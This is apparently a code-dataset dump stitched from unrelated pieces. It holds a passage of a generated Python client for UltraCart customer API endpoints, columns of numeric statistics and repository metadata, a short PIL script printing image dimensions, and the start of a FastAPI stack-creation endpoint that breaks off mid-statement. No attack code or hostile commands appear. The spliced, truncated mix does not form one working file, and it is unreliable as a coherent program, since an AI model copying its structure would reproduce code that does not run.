    :param str sort: The sort order of the customers.  See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomersResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # (keyword name, wire name) pairs, in the order the query string is
    # built.  Pagination/sorting/expansion keywords are prefixed with an
    # underscore on the wire; the search filters pass through unchanged.
    query_fields = [
        ('email', 'email'),
        ('qb_class', 'qb_class'),
        ('quickbooks_code', 'quickbooks_code'),
        ('last_modified_dts_start', 'last_modified_dts_start'),
        ('last_modified_dts_end', 'last_modified_dts_end'),
        ('signup_dts_start', 'signup_dts_start'),
        ('signup_dts_end', 'signup_dts_end'),
        ('billing_first_name', 'billing_first_name'),
        ('billing_last_name', 'billing_last_name'),
        ('billing_company', 'billing_company'),
        ('billing_city', 'billing_city'),
        ('billing_state', 'billing_state'),
        ('billing_postal_code', 'billing_postal_code'),
        ('billing_country_code', 'billing_country_code'),
        ('billing_day_phone', 'billing_day_phone'),
        ('billing_evening_phone', 'billing_evening_phone'),
        ('shipping_first_name', 'shipping_first_name'),
        ('shipping_last_name', 'shipping_last_name'),
        ('shipping_company', 'shipping_company'),
        ('shipping_city', 'shipping_city'),
        ('shipping_state', 'shipping_state'),
        ('shipping_postal_code', 'shipping_postal_code'),
        ('shipping_country_code', 'shipping_country_code'),
        ('shipping_day_phone', 'shipping_day_phone'),
        ('shipping_evening_phone', 'shipping_evening_phone'),
        ('pricing_tier_oid', 'pricing_tier_oid'),
        ('pricing_tier_name', 'pricing_tier_name'),
        ('limit', '_limit'),
        ('offset', '_offset'),
        ('since', '_since'),
        ('sort', '_sort'),
        ('expand', '_expand'),
    ]

    # Reject keyword arguments this endpoint does not understand.
    accepted = {name for name, _ in query_fields}
    accepted.update(('async_req', '_return_http_data_only',
                     '_preload_content', '_request_timeout'))
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customers" % key
            )

    query_params = [(wire, kwargs[name])
                    for name, wire in query_fields if name in kwargs]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501

    return self.api_client.call_api(
        '/customer/customers', 'GET',
        {},                 # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CustomersResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_customers_by_query(self, customer_query, **kwargs):  # noqa: E501
    """Retrieve customers by query  # noqa: E501

    Retrieves customers from the account.  If no parameters are specified, all customers will be returned.  You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customers_by_query(customer_query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CustomerQuery customer_query: Customer query (required)
    :param int limit: The maximum number of records to return on this one API call. (Max 200)
    :param int offset: Pagination of the record set.  Offset is a zero based index.
    :param str since: Fetch customers that have been created/modified since this date/time.
    :param str sort: The sort order of the customers.  See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomersResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: always ask the delegate for the payload only.
    kwargs['_return_http_data_only'] = True
    # Thread when async_req is truthy, deserialized data otherwise.
    return self.get_customers_by_query_with_http_info(customer_query, **kwargs)  # noqa: E501
def get_customers_by_query_with_http_info(self, customer_query, **kwargs):  # noqa: E501
    """Retrieve customers by query  # noqa: E501
    Retrieves customers from the account. If no parameters are specified, all customers will be returned. You will need to make multiple API calls in order to retrieve the entire result set since this API performs result set pagination. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customers_by_query_with_http_info(customer_query, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param CustomerQuery customer_query: Customer query (required)
    :param int limit: The maximum number of records to return on this one API call. (Max 200)
    :param int offset: Pagination of the record set. Offset is a zero based index.
    :param str since: Fetch customers that have been created/modified since this date/time.
    :param str sort: The sort order of the customers. See Sorting documentation for examples of using multiple values and sorting by ascending and descending.
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomersResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['customer_query', 'limit', 'offset', 'since', 'sort', 'expand']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customers_by_query" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_query' is set
    if ('customer_query' not in params or
            params['customer_query'] is None):
        raise ValueError("Missing the required parameter `customer_query` when calling `get_customers_by_query`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    # The REST API expects underscore-prefixed query parameter names.
    query_params = []
    if 'limit' in params:
        query_params.append(('_limit', params['limit']))  # noqa: E501
    if 'offset' in params:
        query_params.append(('_offset', params['offset']))  # noqa: E501
    if 'since' in params:
        query_params.append(('_since', params['since']))  # noqa: E501
    if 'sort' in params:
        query_params.append(('_sort', params['sort']))  # noqa: E501
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    # The CustomerQuery object is serialized as the JSON request body.
    body_params = None
    if 'customer_query' in params:
        body_params = params['customer_query']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/query', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='CustomersResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_customers_for_data_tables(self, **kwargs):  # noqa: E501
    """Retrieve customers for DataTables plugin  # noqa: E501

    Convenience wrapper around get_customers_for_data_tables_with_http_info
    that returns only the deserialized data. Synchronous by default; pass
    async_req=True to receive the request thread instead.

    :param async_req bool
    :param str expand: The object expansion to perform on the result.
    :return: DataTablesServerSideResponse, or the request thread when
             async_req is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.get_customers_for_data_tables_with_http_info(**kwargs)  # noqa: E501
def get_customers_for_data_tables_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieve customers for DataTables plugin  # noqa: E501
    Retrieves customers from the account. If no searches are specified, all customers will be returned. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customers_for_data_tables_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: DataTablesServerSideResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['expand']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customers_for_data_tables" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    # The REST API expects underscore-prefixed query parameter names.
    query_params = []
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    # No request body for this endpoint despite the POST verb.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/dataTables', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='DataTablesServerSideResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_email_verification_token(self, token_request, **kwargs):  # noqa: E501
    """Create a token that can be used to verify a customer email address  # noqa: E501

    Convenience wrapper around get_email_verification_token_with_http_info
    that returns only the deserialized data. Synchronous by default; pass
    async_req=True to receive the request thread instead. How the customer
    interacts with the token is left to the merchant.

    :param async_req bool
    :param EmailVerifyTokenRequest token_request: Token request (required)
    :return: EmailVerifyTokenResponse, or the request thread when async_req
             is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.get_email_verification_token_with_http_info(token_request, **kwargs)  # noqa: E501
def get_email_verification_token_with_http_info(self, token_request, **kwargs):  # noqa: E501
    """Create a token that can be used to verify a customer email address  # noqa: E501
    Create a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_email_verification_token_with_http_info(token_request, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param EmailVerifyTokenRequest token_request: Token request (required)
    :return: EmailVerifyTokenResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['token_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_email_verification_token" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'token_request' is set
    if ('token_request' not in params or
            params['token_request'] is None):
        raise ValueError("Missing the required parameter `token_request` when calling `get_email_verification_token`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The EmailVerifyTokenRequest is serialized as the JSON request body.
    body_params = None
    if 'token_request' in params:
        body_params = params['token_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/email_verify/get_token', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EmailVerifyTokenResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def insert_customer(self, customer, **kwargs):  # noqa: E501
    """Insert a customer  # noqa: E501

    Convenience wrapper around insert_customer_with_http_info that returns
    only the deserialized data. Synchronous by default; pass async_req=True
    to receive the request thread instead.

    :param async_req bool
    :param Customer customer: Customer to insert (required)
    :param str expand: The object expansion to perform on the result.
    :return: CustomerResponse, or the request thread when async_req is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.insert_customer_with_http_info(customer, **kwargs)  # noqa: E501
def insert_customer_with_http_info(self, customer, **kwargs):  # noqa: E501
    """Insert a customer  # noqa: E501
    Insert a customer on the UltraCart account. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.insert_customer_with_http_info(customer, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param Customer customer: Customer to insert (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['customer', 'expand']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method insert_customer" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer' is set
    if ('customer' not in params or
            params['customer'] is None):
        raise ValueError("Missing the required parameter `customer` when calling `insert_customer`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    # The REST API expects underscore-prefixed query parameter names.
    query_params = []
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    # The Customer object is serialized as the JSON request body.
    body_params = None
    if 'customer' in params:
        body_params = params['customer']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type` (note: write endpoints declare the charset)
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json; charset=UTF-8'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='CustomerResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer(self, customer, customer_profile_oid, **kwargs):  # noqa: E501
    """Update a customer  # noqa: E501

    Convenience wrapper around update_customer_with_http_info that returns
    only the deserialized data. Synchronous by default; pass async_req=True
    to receive the request thread instead.

    :param async_req bool
    :param Customer customer: Customer to update (required)
    :param int customer_profile_oid: The customer_profile_oid to update. (required)
    :param str expand: The object expansion to perform on the result.
    :return: CustomerResponse, or the request thread when async_req is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.update_customer_with_http_info(customer, customer_profile_oid, **kwargs)  # noqa: E501
def update_customer_with_http_info(self, customer, customer_profile_oid, **kwargs):  # noqa: E501
    """Update a customer  # noqa: E501
    Update a customer on the UltraCart account. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_customer_with_http_info(customer, customer_profile_oid, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param Customer customer: Customer to update (required)
    :param int customer_profile_oid: The customer_profile_oid to update. (required)
    :param str expand: The object expansion to perform on the result. See documentation for examples
    :return: CustomerResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['customer', 'customer_profile_oid', 'expand']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer' is set
    if ('customer' not in params or
            params['customer'] is None):
        raise ValueError("Missing the required parameter `customer` when calling `update_customer`")  # noqa: E501
    # verify the required parameter 'customer_profile_oid' is set
    if ('customer_profile_oid' not in params or
            params['customer_profile_oid'] is None):
        raise ValueError("Missing the required parameter `customer_profile_oid` when calling `update_customer`")  # noqa: E501
    collection_formats = {}
    # customer_profile_oid is substituted into the URL path template below.
    path_params = {}
    if 'customer_profile_oid' in params:
        path_params['customer_profile_oid'] = params['customer_profile_oid']  # noqa: E501
    # The REST API expects underscore-prefixed query parameter names.
    query_params = []
    if 'expand' in params:
        query_params.append(('_expand', params['expand']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    # The Customer object is serialized as the JSON request body.
    body_params = None
    if 'customer' in params:
        body_params = params['customer']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type` (note: write endpoints declare the charset)
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json; charset=UTF-8'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/{customer_profile_oid}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='CustomerResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_email_lists(self, customer_profile_oid, list_changes, **kwargs):  # noqa: E501
    """Update email list subscriptions for a customer  # noqa: E501

    Convenience wrapper around update_customer_email_lists_with_http_info
    that returns only the deserialized data. Synchronous by default; pass
    async_req=True to receive the request thread instead.

    :param async_req bool
    :param int customer_profile_oid: The customer profile oid (required)
    :param CustomerEmailListChanges list_changes: List changes (required)
    :return: CustomerEmailListChanges, or the request thread when async_req
             is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.update_customer_email_lists_with_http_info(customer_profile_oid, list_changes, **kwargs)  # noqa: E501
def update_customer_email_lists_with_http_info(self, customer_profile_oid, list_changes, **kwargs):  # noqa: E501
    """Update email list subscriptions for a customer  # noqa: E501
    Update email list subscriptions for a customer # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_customer_email_lists_with_http_info(customer_profile_oid, list_changes, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param int customer_profile_oid: The customer profile oid (required)
    :param CustomerEmailListChanges list_changes: List changes (required)
    :return: CustomerEmailListChanges
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['customer_profile_oid', 'list_changes']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_email_lists" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_profile_oid' is set
    if ('customer_profile_oid' not in params or
            params['customer_profile_oid'] is None):
        raise ValueError("Missing the required parameter `customer_profile_oid` when calling `update_customer_email_lists`")  # noqa: E501
    # verify the required parameter 'list_changes' is set
    if ('list_changes' not in params or
            params['list_changes'] is None):
        raise ValueError("Missing the required parameter `list_changes` when calling `update_customer_email_lists`")  # noqa: E501
    collection_formats = {}
    # customer_profile_oid is substituted into the URL path template below.
    path_params = {}
    if 'customer_profile_oid' in params:
        path_params['customer_profile_oid'] = params['customer_profile_oid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The CustomerEmailListChanges object is serialized as the JSON body.
    body_params = None
    if 'list_changes' in params:
        body_params = params['list_changes']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type` (note: write endpoints declare the charset)
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json; charset=UTF-8'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/{customer_profile_oid}/email_lists', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='CustomerEmailListChanges',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def validate_email_verification_token(self, validation_request, **kwargs):  # noqa: E501
    """Validate a token that can be used to verify a customer email address  # noqa: E501

    Convenience wrapper around
    validate_email_verification_token_with_http_info that returns only the
    deserialized data. Synchronous by default; pass async_req=True to
    receive the request thread instead.

    :param async_req bool
    :param EmailVerifyTokenValidateRequest validation_request: Token validation request (required)
    :return: EmailVerifyTokenValidateResponse, or the request thread when
             async_req is set
    """
    # Strip the HTTP envelope; callers of this wrapper only want the data.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the *_with_http_info variant;
    # when async_req is truthy the delegate returns the request thread.
    return self.validate_email_verification_token_with_http_info(validation_request, **kwargs)  # noqa: E501
def validate_email_verification_token_with_http_info(self, validation_request, **kwargs):  # noqa: E501
    """Validate a token that can be used to verify a customer email address  # noqa: E501
    Validate a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.validate_email_verification_token_with_http_info(validation_request, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param EmailVerifyTokenValidateRequest validation_request: Token validation request (required)
    :return: EmailVerifyTokenValidateResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises below.
    all_params = ['validation_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() snapshots the named parameters; validated kwargs are merged
    # into the same dict so every value can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method validate_email_verification_token" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'validation_request' is set
    if ('validation_request' not in params or
            params['validation_request'] is None):
        raise ValueError("Missing the required parameter `validation_request` when calling `validate_email_verification_token`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The EmailVerifyTokenValidateRequest is serialized as the JSON body.
    body_params = None
    if 'validation_request' in params:
        body_params = params['validation_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/customer/customers/email_verify/validate_token', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EmailVerifyTokenValidateResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 45.358681
| 637
| 0.641915
| 7,865
| 67,403
| 5.250858
| 0.035728
| 0.046685
| 0.033125
| 0.022665
| 0.94099
| 0.920069
| 0.904693
| 0.880527
| 0.870769
| 0.86319
| 0
| 0.015495
| 0.274231
| 67,403
| 1,485
| 638
| 45.389226
| 0.828717
| 0.370889
| 0
| 0.736776
| 1
| 0
| 0.231439
| 0.066301
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035264
| false
| 0
| 0.006297
| 0
| 0.093199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30654c926d1459259843912dc598b58c69cdfb28
| 271
|
py
|
Python
|
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
from PIL import Image

# Print the (width, height) of each image, one value per line, in the same
# order as before: bg2.jpg, IMG_1800.jpg, IMG_1801.jpg. The original code
# repeated the open/size/print sequence three times and never closed the
# files; the loop plus `with` fixes both while producing identical output.
for filename in ('bg2.jpg', 'IMG_1800.jpg', 'IMG_1801.jpg'):
    with Image.open(filename) as im:
        width, height = im.size
    print(width)
    print(height)
| 14.263158
| 31
| 0.712177
| 45
| 271
| 4.244444
| 0.333333
| 0.209424
| 0.172775
| 0.251309
| 0.790576
| 0.790576
| 0.790576
| 0.790576
| 0.790576
| 0.575916
| 0
| 0.038298
| 0.132841
| 271
| 19
| 32
| 14.263158
| 0.774468
| 0
| 0
| 0.692308
| 0
| 0
| 0.113971
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.461538
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
30725ff719d18a99449456d2557a01627db23399
| 7,107
|
py
|
Python
|
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, HTTPException
from schemas import schemas
from security import deps
from crud import user as crud_users
from crud import stacks as crud_stacks
from crud import activityLogs as crud_activity
from helpers.push_task import sync_git, sync_get_vars
from helpers.get_data import check_providers
router = APIRouter()
@router.post("/", response_model=schemas.Stack)
def create_new_stack(
        stack: schemas.StackCreate,
        current_user: schemas.User = Depends(deps.get_current_active_user),
        db: Session = Depends(deps.get_db)):
    """Create a new stack (superusers only).

    Validates the stack name's provider prefix, rejects duplicate names,
    pushes a git-clone task to the squad worker queue, then persists the
    stack and an activity-log entry. Raises 403 for non-superusers, 409 on
    a duplicate name or persistence failure.
    """
    if not crud_users.is_superuser(db, current_user):
        raise HTTPException(status_code=403, detail="Not enough permissions")
    name = "default"
    environment = "default"
    squad = "squad"
    branch = stack.branch
    # Check that the providers encoded in the stack name are supported
    check_providers(stack_name=stack.stack_name)
    # Reject duplicate stack names up front
    db_stack = crud_stacks.get_stack_by_name(db, stack_name=stack.stack_name)
    if db_stack:
        raise HTTPException(
            status_code=409,
            detail="The stack name already exist")
    # Push git task to queue squad; all workers are subscribed to this queue
    task = sync_git(
